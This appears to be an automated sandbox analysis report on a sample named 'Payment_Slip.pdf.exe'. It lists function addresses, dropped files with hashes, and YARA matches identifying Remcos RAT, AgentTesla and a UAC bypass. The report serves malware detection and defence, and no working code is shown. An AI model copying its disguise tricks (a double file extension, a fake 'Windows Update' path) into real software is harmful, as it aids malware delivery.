Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004316FB 17_2_004316FB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0043569E 17_2_0043569E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00443700 17_2_00443700
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004257FB 17_2_004257FB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004128E3 17_2_004128E3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00425964 17_2_00425964
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041B917 17_2_0041B917
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0043D9CC 17_2_0043D9CC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00435AD3 17_2_00435AD3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00424BC3 17_2_00424BC3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0043DBFB 17_2_0043DBFB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0044ABA9 17_2_0044ABA9
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00433C0B 17_2_00433C0B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00434D8A 17_2_00434D8A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0043DE2A 17_2_0043DE2A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041CEAF 17_2_0041CEAF
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00435F08 17_2_00435F08
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_0307A1A0 24_2_0307A1A0
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_03076BA3 24_2_03076BA3
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_03079588 24_2_03079588
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_030798D0 24_2_030798D0
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06812B30 24_2_06812B30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06813148 24_2_06813148
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06810B70 24_2_06810B70
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_0685EF70 24_2_0685EF70
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06850548 24_2_06850548
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06856280 24_2_06856280
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_0685C250 24_2_0685C250
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_068574E7 24_2_068574E7
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_068574E8 24_2_068574E8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_0685C24F 24_2_0685C24F
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AA3608 24_2_06AA3608
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AA7088 24_2_06AA7088
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AAAFDC 24_2_06AAAFDC
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AA39D8 24_2_06AA39D8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AAC328 24_2_06AAC328
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AAC322 24_2_06AAC322
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AAD01F 24_2_06AAD01F
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AA2FE8 24_2_06AA2FE8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_06AA0B30 24_2_06AA0B30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Code function: 24_2_072C2668 24_2_072C2668
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\conserver.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\host.exe E6720928EA03235A4A2AE2183D8E82483EAB11C5D77EC554CA3D85CC69D244B2
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00432525 appears 42 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00412968 appears 78 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00421A32 appears 43 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 0044407A appears 37 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00432525 appears 41 times
Sample file is different than original file name gathered from version info
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190274225.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000025A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000024BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000000.1136659538.0000000000110000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616615800.0000000004A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616254884.00000000049BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-e vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe Binary or memory string: OriginalFileName vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.000000000041B000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
Uses 32bit PE files
Source: Payment_Slip.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
